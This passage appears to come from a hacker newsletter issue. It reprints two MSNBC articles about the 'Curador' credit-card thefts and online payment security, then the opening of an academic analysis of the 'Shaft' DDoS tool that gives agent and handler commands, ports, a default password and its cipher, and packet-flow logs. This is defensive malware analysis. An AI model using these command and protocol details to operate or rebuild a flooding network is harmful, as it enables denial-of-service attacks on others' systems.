     said. "He could have knocked on [the suspects'] doors two
     weeks before the FBI did."
            Davis, who has been a computer security consultant for
     nearly four years, said he got involved in the case in early
     February after reading a boastful post from "Curador" -
     the online alias that authorities say was jointly used by the
     two 18-year-old suspects - on HackerNews.com about
     the theft of credit card information from two e-merchants.
     The credit card information was subsequently posted on a
     Web site by "Curador," who said he took the action to
     publicize the lack of security at many e-commerce sites.
            
     'THAT'S PRETTY LOW'
            "I read the boast and I thought, 'That's pretty low,'"
     said Davis. "I checked and both sites seemed like fairly
     small mom-and-pop type operations and I felt sorry for
     them. So I fired off an e-mail and said, 'I'll help
     you secure your site.' They wrote back and said they had
     no idea they'd even been hit (by hackers)."
            Both Promobility.net and Ltamedia.com, a Knoxville,
     Tenn., seller of "life-enhancing products," agreed to turn
     over their computer logs to Davis so he could determine
     how the intruders had gained entry to their systems and
     close the security holes.
            Looking through the logs, Davis discovered that the
     intrusions were accomplished using two known security
     holes in Microsoft's Internet Information Server, or IIS.
     While Microsoft had issued "patches" to correct the holes
     months earlier, none of the nine Web sites in the United
     States, Canada, Thailand, Japan and the United Kingdom
     that were hit by "Curador" had updated their software to
     eliminate the problem. 
            (Microsoft is a partner in MSNBC.com.)
            While he could have simply fixed the flaws and
     returned to his paying jobs, Davis found himself growing
     increasingly fascinated by the case and pressed on. 
            By analyzing e-mail sent through a free service that the
     hackers wrongly thought would shield the IP address, Davis
     was quickly able to determine that "Curador" was using an
     Internet service provider in England. He then contacted
     Scotland Yard, which referred him to police in South
     Yorkshire, who determined from records obtained from the
     ISP that the "crackers" - the term for computer criminals
     preferred by law-abiding hackers - were in Wales.
            
     SEARCH NARROWS TO TWO HOUSES
            Soon, the British investigators tightened the circle to the
     tiny fishing village of Clynderwen, population 500, and
     ultimately to two houses in the village.
            It was then, Davis said, that he heard from the FBI,
     which learned from the Royal Canadian Mounted Police
     that he was working on the case while investigating the
     thefts from U.S. Web sites. 

            "They were able to quickly obtain logs from everybody
     who had been affected in the U.S. and I explained how
     'Curador' had broken in, showing them, 'Here's the line
     from the log, here's how he exploited the security
     vulnerability.'"
            The FBI, working with the RCMP and the Welsh
     Dyfed-Powys Police Service, orchestrated the arrests on
     Thursday of the 18-year-old suspects. The teenagers were
     questioned for 12 hours after their arrest before being
     released on bail as the investigation continues, Welsh police
     said Monday.
            In accordance with British law, neither of the suspects
     was publicly identified. But one, Raphael Gray, has given
     numerous interviews since his release to say that he had
     acted only to highlight the lack of security on many retail
     Web sites. 
            "I have done the honest thing, but I have been
     ignored," he was quoted as saying by the Sunday Telegraph
     of London. "That's why I posted the information on the
     Internet."
            
     CURADOR'S CLAIMS
            Authorities have not identified the nine e-commerce
     sites they say were burgled, but according to "Curador's"
     Web sites others include Feelgood Falls; Sales Gate;
     Shopping Thailand; Vision Computers; NTD Media and the
     American Society of Clinical Pathologists. 
            Gray has maintained in interviews since his arrest that
     neither he nor his friend had used the stolen credit card data
     for personal gain - an assertion backed up by a British
     businessman who said he hired Gray to run his e-commerce
     site.
     
            "I'd have to give him money to buy lunch or get a
     haircut," the businessman told MSNBC.com on Monday. 
            The businessman, who contacted MSNBC.com,
     agreed to talk about Gray on the condition that neither he
     nor his Web site be identified because he feared it would be
     bad for business.
            His account could not be independently confirmed, but
     his description of Gray was consistent with other published
     accounts.
            The businessman said Gray worked part-time for him
     for two to three months and was in charge of the company's
     Web site, which sells video games. He was fired on March
     2 because of chronic absenteeism, he said.
            
     'HE KNEW HIS STUFF'
            "He was very good at his job," said the man. "Didn't
     turn up very often and his personal hygiene wasn't too
     good, but he knew his stuff. 
            "He worked developing my company's e-commerce
     site, which he claimed was going to be the most secure in
     the business. What I didn't realize was that I had one of the
     world's biggest credit card hackers looking after my
     customers."
            Meanwhile, a claim by Gray that a credit card
     belonging to Microsoft founder Bill Gates was among the
     credit cards he and his friend are accused of stealing was
     determined to be false on Monday. 

      Gray told the Sunday Telegraph that he had sent information
     on a number of the cards, including Gates' card, to a U.S.
     Web site registered to NBC. (NBC is a partner in MSNBC.com.)
     
            But examination of one of the Web sites posted by
     "Curador" showed an entry about William F. Gates. The
     Microsoft founder's name is William H. Gates. The credit
     card number listed also had too few digits to be valid, and
     both Microsoft's address and Gates' e-mail address were
     incorrect. 
            Gray and his friend could face charges under Britain's
     Computer Misuse Act of 1990.
            They also could eventually be extradited to face
     charges in the United States, the FBI's Vatis told
     MSNBC.com on Friday.
            "The primary consideration is what's in the interest of
     justice," said Vatis. "... We have obviously been
     investigating violations of U.S. federal criminal law."
            The teens are alleged to have caused losses that Vatis
     said could amount to more than $3 million, based on the
     cost of canceling the 26,000 credit card accounts and
     issuing new cards. And Vatis said that was "just one
     measure of possible loss." Other costs could arise from any
     fraudulent use of the credit card numbers, as well as the
     expense of repairing compromised Web sites, he said.
            



            The arrests in Wales appear to represent the first major
     international response to a rapidly growing field in computer
     crime. Earlier this month, in response to an MSNBC.com
     investigation of international online credit card theft,
     spokesmen for the FBI and other organizations involved in
     fighting cybercrime said they could not recall any past
     prosecutions in such matters. 
            On Friday, Vatis said he could easily think of
     "international hacking incidents" that have led to
     prosecutions, but not in the context of online credit card
     information.
            Many such cases are under investigation, he said. Vatis
     said the international hurdles to investigating Internet crime
     were not as high as some people might think, contending
     that the FBI was "building more and more bridges every
     day" with law enforcement agencies in other countries.
                         
                         
      -=-
      
      MSNBC supplementary;
      
      March 24th
      
      Can hackers kill credit cards?
     
      Spate of e-commerce intrusions might mean a new form 
      of payment system will come sooner than expected
      By Bob Sullivan
      MSNBC

      March 24 - He calls himself "The Saint of
      E-commerce." Two months ago, "Curador" started
      posting his catalog of stolen credit card numbers
      on his Web page. He stole database after database
      from a variety of e-commerce sites, each time
      updating his site, then gleefully mailing
      notification to reporters. He topped 25,000 records
      from 13 Web sites. Despite all that the financial
      risk and all that violation of personal privacy, no
      one could stop him. But now authorities in Wales
      have arrested two 18-year-olds on charges related
      to the Curador thefts.
               
            AUTHORITIES, OF COURSE, had always removed
     Curador's Web site - at least a dozen times. No matter; he
     used the many free, anonymous Web hosting services
     available on the Internet. And as fast as his Web page is
     taken down, "Curador" would put up another one. 
            The 18-year-old computer intruder, who also goes by the
     nickname "mind gimp," told MSNBC in a telephone interview
     only that he was located somewhere in Europe.
            He wasn't using the credit cards for financial gain, he
     said. The self-proclaimed "Saint of E-commerce" said he
     simply wanted to embarrass the victim Web sites into
     employing better security. He promised to continue breaking
     into e-commerce sites and posting stolen numbers "until I
     don't need to do it anymore or until I get arrested."
            But until Thursday, as MSNBC's Mike Brunker
     reported earlier this month, there hadn't been a single
     reported arrest of a foreign credit card thief by U.S.
     authorities. 

             Curador's thefts are just another story in this year's
      litany of tales surrounding online theft of personal and
      financial information. E-merchants are furiously fighting the
      battle to keep down fraud costs, and consumer confidence
      in Internet safety is continually shaken, with no apparent end
      in sight. So some experts think Curador may just be another
      nail in the coffin of a credit card system that was hardly
      designed for Internet purchasing.
             "Anyone who's serious about this is getting a lesson.
      The wake-up call is here. The time is now," said Stephen
      Orfei, vice president of electronic commerce and emerging
      technology for MasterCard International. Orfei is also the
      spokesperson for SETCo, the Visa- and
      MasterCard-backed organization pushing SET, a new
      payments protocol designed to limit electronic fraud.

      "HOW CAN WE DO MORE?"
             The raging success of online thieves, some say, will
      force the hand of banks, merchants, credit card companies
      and consumers to change the way we spend money much
      sooner than we intended.
             The high-profile hacks have at least gotten the attention
      of merchants, said Alyxia Do, electronic payment and smart
      card analyst with Frost & Sullivan.
             "It seems that there have been a greater number of
      queries coming in," she said. "It began with the CD Universe
      break-in and it has just continued to be in the news. I have
      heard more and more merchants are going back to Visa and
      MasterCard and asking, 'How can we do more?'"
             The stakes are higher for merchants than
      consumers. While consumers face a limited liability of $50
      and a paperwork hassle, online merchants must write off
      credit card theft as "acceptable loss." Hard data on how
      bad losses are is impossible to find, but anecdotally some
      industries relate fraud rates as high as 40 percent.
      Merchants use inexact software to filter out potential
      fraudulent purchases, but that means they turn away
      legitimate sales, too.
             The mathematics are alarming. In fact, according to Joe
      Barrett, chairman of the Internet Fraud Prevention Advisory
      Council, in some industries, merchants are turning away 20
      percent of proposed sales.
             "You're killing your business. You'd be better off
      taking every sale and self-insuring," he said.
            
      SMART CARDS, FINALLY?
             "A number and a date and you can buy anything you
      want with it." That's how a teen-aged Internet credit card
      thief described to MSNBC the fundamental problem of
      using credit cards online.

             The familiar plastic currency was designed to be
      physically handed to merchants, who could at least make a
      cursory check to see if signatures on the card and the sales
      slip matched. Online, commerce is anonymous. There is no
      way to see who's entering the credit card numbers into the
      Web page, an anonymity that heavily favors the fraud
      artists.
             Several technologies hope to tip the scales against
      thieves by implementing systems that require some
      real-world physical component when shopping online.
      Smart cards, the generic term for any plastic which includes
      an embedded microchip, are one promising solution.
             Smart cards, which identify the user through encrypted
      information embedded on the chip, must be inserted into a
      "card reader" attached to the computer. That means the
      card can't be used for e-commerce unless the purchaser is
      currently holding it.
             A PIN number is also required, so a thief needs to
      physically have the card and a security code in order to use
      it. That's not an insurmountable hurdle, but a far more
      difficult one than using "a number and a date."
             Still, smart cards are 20 years old, and while there have
      been smatterings of adoption in Europe, trials of the
      technology in the U.S. have failed repeatedly. Consumers
      perceived them as inconvenient, and in the past they have
      been unmoved by the improvement in security.
             

             "In those trials, people still needed to carry around
      spare change anyway," said Don Davis, editor of Card
      Technology Magazine. "They didn't really solve a problem
      for people. Now with the Internet, that changes things.
      There is a real problem to be solved with smart cards."
             And there appears to finally be momentum behind the
      chip-enabled cards. Microsoft and Sun are currently battling
      over the operating system used to run the cards, and
      Windows 2000 includes native support for the technology.
      But perhaps the biggest leap forward came last year, when
      American Express announced "Blue," the first widely
      distributed smart card in the United States. Blue is a hybrid;
      it still has the old-fashioned magnetic strip and can be used
      as a traditional credit card. But the embedded chip can be
      used for online purchases, and it also can be updated with
      new software.
             Part of the fresh promise for smart cards comes from
      the changing economics in the industry. Card readers, which
      must be connected to every PC if smart cards are to be
      used, are now cheap enough to be given away. That's
      exactly what American Express decided to do when it
      launched "Blue" last year.
             "We see a lot of promise to the technology. There is a
      real customer need out there," said Molly Fause, American
      Express spokesperson.
            
      BABY STEPS
             Still, "Blue" is just a toe in the water. Currently, the
      chip only adds convenience -- it lets cardholders open a
      "digital wallet," including billing information, with a single
      swipe. But it is not used by merchants to positively identify
      consumers; instead, the old-fashioned number is used, and it
      can be stolen and exploited just like traditional cards.

             And that's been the problem for smart cards all along
      -- while European governments and institutions have
      aggressively supported the technology (for example,
      Germany has distributed 80 million cards to all users in its
      health care system), U.S. companies have taken baby steps.
      Davis points out that U.S. adoption is still likely to be
      among the slowest in the world. With aggressive initiatives in
      France and Germany already, he said most of Europe will
      have converted to smart cards by 2005, with major Latin
      American countries following soon after.
             Still, the American Express initiative, while tepid, is
      important. The company wouldn't say how many Blue
      cards have been issued; Faust would only say the company
      has received twice as many applications as anticipated.
      Analyst Do said she expects 1.5 million Blue cards to be in
      consumers' hands by year's end.
             "Believe me, the rest of the issuers in the U.S. are
      closely following what American Express is doing," he said.
      The real goal, he said, is to ply consumers with coupons and
      loyalty points they can download onto smart cards, which
      will make them an attractive proposition. "If American
      Express figures that out, the rest of the industry will react
      quickly."
             Still, getting Internet users to add hardware to their
      existing systems is a tremendous challenge. Davis speculates
      that many Blue owners don't bother to hook up the card
      reader, for example. And Do goes farther, suggesting that
      the need to add a card reader makes smart cards a
      non-starter in the consumer space.

             But others say the shift will be swift, once consumers
      are convinced about the benefits of smart cards.
             "The last paradigm shift I would liken this to
      is the mouse," said Rick McNeef, vice president of
      corporate development at Cybersafe Inc. "How long did it
      take us to get a mouse in conjunction with every
      keyboard?" He also thinks credit cards have built-in
      obsolescence, since they all have an expiration date, and
      most of our renewal cards will have chips inside. "Whatever
      you have in your wallet right now, the expiration date is
      three years or less. There's an automatic replacement
      anyway."
      
       SET MAKES A COMEBACK
       Additional hardware isn't the only available method for
       proving someone is who they say they are on the Internet.
       The SET (secure electronic transactions) protocol
       accomplishes that goal through software. In SET, each
       customer receives a unique digital certificate, the
       cyberworld equivalent of a real-life signature. The certificate
       is "wrapped" around each transaction, and unwrapped by
       banks at the other end -- no more anonymous commerce.
      
       "It transposes the physical world model into
       cyberspace," said Orfie, speaking on behalf of SETCo.
       With each transaction, the consumer and the merchant must
       prove they are who they say they are, using the special SET
       digital authentication. That gives the bank an "irrefutable
       audit trail," meaning criminals could be traced. More
       important, it satisfies the bank's requirement for a signature
       on each transaction, meaning merchants won't receive those
       fraud chargebacks that are currently a part of doing
       business online.
       But SET, like smart cards, has been slow to get off the
       ground. First tested in 1996, the standard appeared to be
       dead in the water last year. The SETCo.org Web site lists
       only about 25 participating merchants. The extra decryption
       processes proved slow and cumbersome; standards
       weren't set, and big e-commerce companies went with the
       now-familiar "SSL" instead.
       The fear when e-commerce was first introduced was
       that ingenious card thieves would listen in on data being
       slung around the Internet and pick off credit card
       information as it went by, much like a wire tap. So, much
       attention was given to Secure Socket Layer, or SSL,
       technology, which encrypts the information while it's in
       transit. But SSL says nothing about who's at either end of
       the transaction. And unfortunately, cyber-eavesdropping
       has turned out to be a non-issue. The problems begin when
       the card number arrives at the merchant, who decrypts it.
       But with the recent surge of high-profile credit card thefts,
       SET and its authentication capabilities are getting a new life,
       some say.

       [Graphic: MSNBC research]

       "We've anticipated this problem, which is now rearing
       its ugly little head," Orfie said. "We're saying we have a
       solution."
       Since SET requires a much less costly infrastructure
       upgrade, it may be the biggest benefactor from the slew of
       hack attacks, Analyst Do said.
       "It's getting up and dusting itself off and starting to walk
       again," she said. "Online hacking will definitely promote
       some kind of network security rather than smart cards."
      
       STORES AREN'T BANKS
       With either a hardware or a software solution, most
       experts say that one fundamental change to the current
       payments system is required. Today, merchants are forced
       to act like banks. They are acquiring and storing personal
       financial records -- namely, credit cards.
       SET and any of the various smart card proposals can
       take this banking role away from retailers. In these new
       systems, consumers who hit "submit" on a Web site can
       send their purchase request to their own bank. Their bank
       then gives the money to the e-commerce store, along with
       some kind of unique identifying information. But personal
       bank account numbers, or credit card numbers, are never
       sent to the Web site.
       "The best place for the card to be is to remain in the
       banking system," said Gerry Gay, vice president of sales
       and marketing at SafeTpay.com, Inc. His company recently
       launched a numeric keypad/card reader that acts like a
       mini-ATM when attached to a personal computer. The card
       reader immediately encrypts PIN numbers and card
       numbers and sends the data directly to banks. Merchants
       only receive their money and a tracking number.
       "You eliminate another arena where the data can be
       compromised," Gay said. "As things are, you're entrusting
       your card data to someone who's outside the payment
       system."

      OLD-FASHIONED BARN RAISING
             Still, even with the increased impetus supplied by
      cybercrooks, smart cards or any other payment solution
      won't take over overnight. Old habits -- at banks,
      merchants, and among consumers -- die hard. Even if those
      old habits are costly.
             "The devil you know is better than the devil you don't
      know," Gay said, describing his company's challenge in
      convincing banks and merchants to support his system.
             But no fright over fraud can overcome the challenges of
      an upgrade -- in the case of smart cards, Analyst Do thinks
      a complete overhaul of the system will require $15 billion.
      Combine that with the fundamental change either SET or
      smart cards would hoist on consumers, and you have some
      formidable obstacles.
             That makes Barrett, of the Internet Fraud Prevention
      Advisory Council, leery.
             "A lot of these things create issues for consumers.
      They're moving the pain onto consumers and taking it away
      from merchants, and that's not going to work," said Barrett,
      also an executive at Vitessa Corp., an online payment
      company.
             That's why he thinks a very low-tech solution is needed
      to deal with credit card crooks. If Barrett had his way,
      companies like Amazon.com would open up their internal
      fraud databases to all e-merchants. Such an open policy
      would quickly create a list of suspicious e-mail addresses,
      Internet Service providers, and of course, credit card
      numbers.
             "I try to encourage people to think about fraud
      detection as a public good," he said. The proposal has so
      far fallen on deaf ears, as most merchants see their fraud
      data as top-secret proprietary information. "Merchants on
      the Internet have a tendency to want to wall off and control
      and not share their knowledge or incidents of fraud.
             "Amazon doesn't compete as a fraud detection
      company. In so doing what they're doing is hoarding
      information -- If you live in a dangerous neighborhood, are
      you safe if you buy weapons? No. You still haven't cleaned
      up the neighborhood. If the top 100 merchants on the Net
      put in place a technology that they could demonstrate
      immediately it's hard for hackers, that would clean up the
      neighborhood."
             His proposal is not so far, surprisingly, from the
      community-based solution proposed by the Saint of
      E-Commerce.
             "There should be an Internet Bureau of Commerce that
      can list every single person on the Internet who accepts
      credit cards and people should be invited to try to break
      in," Curador said. "And if you can, then they are listed as
      unsafe."
             Such lists already exist -- but they are shared only
      among members of the Internet underground, and like
      Curador's notorious Web page, come and go under cover
      of Internet anonymity. That means, for now, the bad guys
      appear to be much better at sharing information than the
      good guys. And while next-generation payment systems
      continue to languish in trials, criminals continue to order
      anything they want "with a number and a date."
                                                   
               
               
                      
      @HWA      
      
111.0 PSS: Shaft Distributed DoS tool analysis Sven Dietrich
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Packetstorm Security http://packetstorm.securify.com/
      
      
      UNFORMATTED = AS IS, WARNING C=SOURCE INCLUDED - Ed
      
      
      ================================================================================

        An analysis of the ``Shaft'' distributed denial of service tool
         
      ================================================================================      
      
      Sven Dietrich
      NASA Goddard Space Flight Center
      <spock@sled.gsfc.nasa.gov>
      
      Neil Long  
      Oxford University
      <neil.long@computing-services.oxford.ac.uk>
      
      David Dittrich  
      University of Washington
      <dittrich@cac.washington.edu>
      
      Copyright 2000. All rights reserved.                    
      March 13, 2000
      
      -- 1. Introduction
      ------------------
      
        This is an analysis of the "Shaft" distributed denial of service
        (DDoS) tool. Denial of service is a technique to deny access to a
        resource by overloading it, such as packet flooding in the network
        context. Denial of service tools have existed for a while, whereas
        distributed variants are relatively recent. The distributed nature
        adds the "many to one" relationship.  Throughout this analysis, most
        actual host names have been modified or removed.
        
      -- 2. Historical overview
      -------------------------
      
        "Shaft" belongs in the family of tools discussed earlier, such as 
        Trinoo, TFN, Stacheldraht, and TFN2K. As in those tools, there are
        handler (or master) and agent programs. The general concepts of these
        tools can be found in a Distributed Intruder Tools Workshop Report held
        in November 1999 at the Computer Emergency Response Team Coordination
        Center (CERT/CC) in Pittsburgh, Pennsylvania:
      
               http://www.cert.org/reports/dsit_workshop.pdf 
       
        In chronological order, there are Trinoo, TFN, Stacheldraht, Shaft, and
        TFN2K. Trinoo, TFN, and Stacheldraht were analyzed in [5], [6], and [7] 
        respectively. TFN2K was recently analyzed in [1].
      
        In the first two months of 2000, DDoS attacks against major Internet
        sites (such as CNN, ZDNet, Amazon etc.) have brought these tools
        further into the limelight. There are a few papers covering DDoS to
        be found at:
      
               http://packetstorm.securify.com/distributed/
               http://staff.washington.edu/dittrich/misc/ddos/
               http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
      
      
      -- 3. Analysis
      --------------
      
        Shaftnode was recovered, initially in binary form, in late November
        1999, then in source form for the agent. Distinctive features are
        the ability to switch handler servers and handler ports on the fly,
        making detection by intrusion detection tools difficult from that
        perspective, a "ticket" mechanism to link transactions, and the
        particular interest in packet statistics.
        
      -- 3.1 The network: client(s)-->handler(s)-->agent(s)-->victim(s)
      -----------------------------------------------------------------
      
        The "Shaft" network is made up of one or more handler programs
        ("shaftmaster") and a large set of agents ("shaftnode").  The attacker
        uses a telnet program ("client") to connect to and communicate with the
        handlers. A "Shaft" network would look like this:
        
                         +--------+             +--------+
                         | client |             | client |
                         +--------+             +--------+
                             |                      |
              . . . --+------+---------------+------+----------------+-- . . .
                      |                      |                       |
                      |                      |                       |
                +-----------+          +-----------+           +-----------+
                |  handler  |          |  handler  |           |  handler  |
                +-----------+          +-----------+           +-----------+
                      |                      |                       |
                      |                      |                       |
      . . . ---+------+-----+------------+---+--------+------------+-+-- . . .
               |            |            |            |            |
               |            |            |            |            |
           +-------+    +-------+    +-------+    +-------+    +-------+
           | agent |    | agent |    | agent |    | agent |    | agent |
           +-------+    +-------+    +-------+    +-------+    +-------+
      
      
           
      -- 3.2 Network Communication
      ----------------------------
      
        Client to handler(s):  20432/tcp
        Handler to agent(s):   18753/udp
        Agent to handler(s):   20433/udp
        
        "Shaft" (in the analyzed version, 1.72) is modeled after Trinoo, in that
        communication between handlers and agents is achieved using the 
        unreliable IP protocol UDP. See Stevens [18] for an extensive discussion of 
        the TCP and UDP protocols. Remote control is via a simple telnet connection
        to the handler. "Shaft" uses "tickets" for keeping track of its individual
        agents. Both passwords and ticket numbers have to match for the agent to
        execute the request. A simple letter-shifting (Caesar cipher, see Schneier
        [17]) is in use. 
        
      -- 3.3 Commands
      ---------------
      
        The command structure is divided into the agent and handler command
        syntax groups.  The attacker interacts with the handler via a command
        line.
      
      -- 3.3.1 Agent Command Syntax
      
        Accepted by agent and replies generated back to the handler:  
      
              size <size>
                  Size of the flood packets.
                  
                  Generates a "size" reply.
              
              type <0|1|2|3>
                  Type of DoS to run 
                  0 UDP, 1 TCP, 2 UDP/TCP/ICMP, 3 ICMP
                  
                  Generates a "type" reply.
                  
              time <length>
                  Length of DoS in seconds
                  
                  Generates a "time" reply.
                  
              own <victim>
                  Add victim to list of hosts to perform denial of service on
                  
                  Generates an "owning" reply.
                  
              end <victim>
                  Removes victim from list of hosts (see "own" above)
                  
                  Generates a "done" reply.
                  
              stat 
                  Requests packet statistics from agent
                  
                  Generates a "pktstat" reply.
                  
              alive
                  Are you alive?
                  
                  Generates an "alive blah" reply.
                  
              switch <handler> <port>
                  Switch the agent to a new handler and handler port
                  
                  Generates a "switching" reply.
                  
              pktres <host>
                  Request packet results for that host at the end of the flood
                  
                  Generates a "pktres" reply.
              
              
        Sent by agent:
              
              new <password>
              
                  Reporting for duty
              
              pktres <password> <sock> <ticket> <packets sent>
              
                  Packets sent to the host identified by <ticket> number
              
                  
      -- 3.3.2 Handler (shaftmaster) Command Syntax
      
        Little is known about the handler, but this is a speculation, pieced
        together from clues, of what its command structure could look like:
                
                mdos <host list>
                    Start a distributed denial of service attack (mdos = massive
                    denial of service?) directed at <host list>.
                        
                        Sends out "own host" messages to all agents.
                        
                edos <host list>
                    End the above attack on <host list>.
                        
                        Sends out "end host" messages to all agents.
                        
                time <length>
                    Set the duration of the attack.
                        
                        Sends out "time <length>" to all agents.
                        
                size <packetsize>
                    Set the packetsize for the attack (8K maximum as seen in
                    source).
                        
                        Sends out "size <packetsize>" to all agents.
                
                type <UDP|TCP|ICMP|BOTH>
                    Set the type of attack, UDP packet flooding, TCP SYN
                    packet flooding, ICMP packet flooding, or all three (here
                    BOTH = ICMP and IP protocols)
              
                        Sends "type <type>" to all agents.
                        
                +node <host list>
                    Add new agents
                        
                -node <host list>
                    Remove agents from pool
                        
                ns <host list>
                    Perform a DNS lookup on <host list>
                        
                lnod 
                    List all agents
                        
                ltic
                    List all tickets (transactions?)
                        
                pkstat
                    Show total packet statistics for agents
                        
                        Sends out "stat" request to all agents.
                        
                alive
                    Send an "alive" to all agents.
                    
                    A possible argument to alive is "hi"
                        
                stat
                    show status?
                        
                switch
                    become the handler for agents
                        
                        Send "switch" to all agents.
                        
                ver
                    show version
                        
                exit
                
      
      -- 3.4 Password protection
      --------------------------
      
        After connecting to the handler using the telnet client, the attacker
        is prompted with "login:". Too little is known about the handler or 
        its encryption method for logging in. A cleartext connection to the handler
        port is obviously a weakness. 
      
      -- 3.5 Detection
      ----------------
      
      -- 3.5.1 Binaries and their behavior
      
        As with previous DDoS tools, the methods used to install the handler/agent 
        will be the same as installing any program on a compromised Unix system, 
        with all the standard options for concealing the programs and files (e.g.,
        use of hidden directories, "root kits", kernel modules, etc.) The 
        reader is referred to Dittrich's Trinoo analysis [5] for a description of
        possible installation methods of this type of tool. 
      
        Precautions have been taken to hide the default handler in the binary code.
        In the analyzed code, the default handler is defined as follows:
              
              #define MASTER          "23:/33/75/28" 
              
        which would translate into 129.22.64.17 (electrochem1.echem.cwru.edu)
        using the same simple cipher mentioned above. Port numbers are munged
        before actual use, e.g. 
      
          #define MASTER_PORT     20483
          
        is really port 20433.
      
        All these techniques intend to hide the critical information from prying
        eyes performing forensics on the code. The program itself tries to hide
        itself as a legitimate Unix process (httpd in the default configuration).
      
        Looking at strings in the shaftnode application reveals the following:
              
          > strings -n 3 shaftnode 
          pktres
          switch
          alive
          stat
          end
          own
          time
          type
          size
          httpd
          23:/33/75/28               
          Unable to fork. (do it manually)
          shift
          new %s
          size %s %s %s %s
          type %s %s %s %s
          time %s %s %s %s
          owning %s %s %s %s
          switched %s %s %s
          done %s %s %s %s
          pktstat %s %s %s %lu
          alive %s %s %s blah
          %d.%d.%d.%d
          Error sending tcp packet from %s:%i to %lu:%i
          pktres %s %i %i %lu
      
      
        Upon launch, the "Shaft" agent (the "shaftnode") reports back to its
        default handler (its "shaftmaster") by sending a "new <upshifted
        password>" command. For the default password of "shift" found in the
        analyzed code, this would be "tijgu".  Therefore a new agent would send
        out "new tijgu", and all subsequent messages would carry that password in
        it. Only in one case does the agent shift in the opposite direction for
        one particular command, e.g. "pktres rghes". It is unclear at the moment
        whether this is intentional or not.
      
        Incoming commands arrive in the format:
      
        "command <upshifted password> <command arg> <socket> <ticket> <optional args>"
      
        For most commands, the password and socket/ticket need to have the right magic
        in order to generate a reply and the command to be executed.
      
        Message flow diagram between handler H and agent A:
        
               Initial phase:    A -> H: "new", f(password)
                Running loop:    H -> A: cmd, f(password), [args], Na, Nb 
                                 A -> H: cmdrep, f(password), Na, Nb, [args]
                                                 
                      - f(X) is the Caesar cipher function on X
                      - Na, Nb are numbers (tickets, socket numbers)
                      - cmd, cmdrep are commands and command acknowledgments
                      - args are command arguments
      
        The flooding occurs in bursts of 100 packets per host, with the source
        port and source address randomized. This number is hard-coded, but it is
        believed that more flexibility can be added. Whereas the source port
        spoofing only works if the agent is running as a root privileged process,
        the author has added provisions for packet flooding using the UDP protocol
        and with the correct source address in the case the process is running as a
        simple user process. It is noteworthy that the random function is not
        properly seeded, which may lead to predictable source port sequences and
        source host IP sequences. 
       
            Source port = (rand() % (65535-1024)) + 1024     where % is the C
                                                             modulus operator

        This yields source ports from 1024 to 65534, i.e. never a privileged
        port below 1024.

            Source IP =  rand()%255.rand()%255.rand()%255.rand()%255

        Each octet lies between 0 and 254, so the source IP numbers can (and
        will) contain a zero in the leading octet, and never contain 255 in
        any octet.
      
        Additionally, the sequence number for all TCP packets is fixed, namely
        0x28374839, which helps with respect to detection at the network level.
        The ACK and URGENT flags are randomly set, except on some platforms.
        Destination ports for TCP and UDP packet floods are randomized. 
      
        The client must choose the duration ("time"), the packet size, and the
        type of packet flooding directed at the victim hosts. Each set of hosts
        has its own duration, which is divided evenly across all hosts in the
        set. This is unlike TFN [6], which forks an individual process for each
        victim host. For the type, the client can select UDP, TCP SYN, or ICMP
        packet flooding, or the combination of all three. Even though there is
        potential for a different type and packet size per set of victim hosts,
        this feature is not used in this version.
         
        The author of "Shaft" seems to have a particular interest in statistics,
        namely packet generation rates of its individual agents. The statistics on 
        packet generation rates are possibly used to determine the "yield" of the 
        DDoS network as a whole. This would allow the attacker to stop adding hosts
        to the attack network when it reached the necessary size to overwhelm the
        victim network, and to know when it is necessary to add more agents to
        compensate for loss of agents due to attrition during an attack (as the
        agent systems are identified and taken off-line.)
      
        Currently, the ability to switch host IP and port for the handler exists,
        but the listening port for the agent remains the same. It is foreseeable
        that this will change in the future.
      
      -- 3.5.2 A sample attack
      
        In this section we will look at a practical example of an attack carried
        out with the "Shaft" distributed denial of service attack tool, as seen
        from the attacking network perspective.
        
        The shaftnode agent when in use, as seen by "lsof" [10]:
              
        # lsof -c shaftnode
        COMMAND    PID    USER   FD   TYPE       DEVICE    SIZE      NODE NAME
        shaftnode 13489   root  cwd   VDIR        0,0       400        2  /tmp
        shaftnode 13489   root  txt   VREG        0,0     19492       10  /tmp (swap)
        shaftnode 13489   root  txt   VREG       32,0    662764   182321  /usr/lib/libc.so.1
        shaftnode 13489   root  txt   VREG       32,0     17480   210757  /usr/platform/sun4u/lib/libc_psr.so.1
        shaftnode 13489   root  txt   VREG       32,0    566700   182335  /usr/lib/libnsl.so.1
        shaftnode 13489   root  txt   VREG       32,0     39932   182348  /usr/lib/libw.so.1
        shaftnode 13489   root  txt   VREG       32,0     15720   182334  /usr/lib/libmp.so.1
        shaftnode 13489   root  txt   VREG       32,0     15720   182327  /usr/lib/libintl.so.1
        shaftnode 13489   root  txt   VREG       32,0     68780   182342  /usr/lib/libsocket.so.1
        shaftnode 13489   root  txt   VREG       32,0      2564   182324  /usr/lib/libdl.so.1
        shaftnode 13489   root  txt   VREG       32,0    137160   182315  /usr/lib/ld.so.1
        shaftnode 13489   root   0u   inet 0x507dc770     0t116      TCP  hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
        shaftnode 13489   root   1u   inet 0x507dc770     0t116      TCP  hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
        shaftnode 13489   root   2u   inet 0x507dc770     0t116      TCP  hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
        shaftnode 13489   root   3u   inet 0x5032c7d8       0t0      UDP  *:18753 (Idle)
      
        As one can see, the agent is waiting to receive commands on its default
        UDP port number 18753. The TCP connection back to the handler remains
        unexplained to date.
      
        Packet flows:
        
        Date      Time    Protocol   Source IP/Port  Flow  Destination IP/Port
        
        Sun 11/28 21:39:22    tcp    129.22.64.17.53982 <->    x.x.x.x.21    
        Sun 11/28 21:39:56    udp    x.x.x.x.33198  ->    129.22.64.17.20433 
        Sun 11/28 21:45:20    udp    129.22.64.17.1765   ->    x.x.x.x.18753   
        Sun 11/28 21:45:20    udp    x.x.x.x.33199  ->    129.22.64.17.20433 
        Sun 11/28 21:45:59    udp    129.22.64.17.1866   ->    x.x.x.x.18753 
        Sun 11/28 21:45:59    udp    x.x.x.x.33200  ->    129.22.64.17.20433 
        Sun 11/28 21:45:59    udp    129.22.64.17.1968   ->    x.x.x.x.18753 
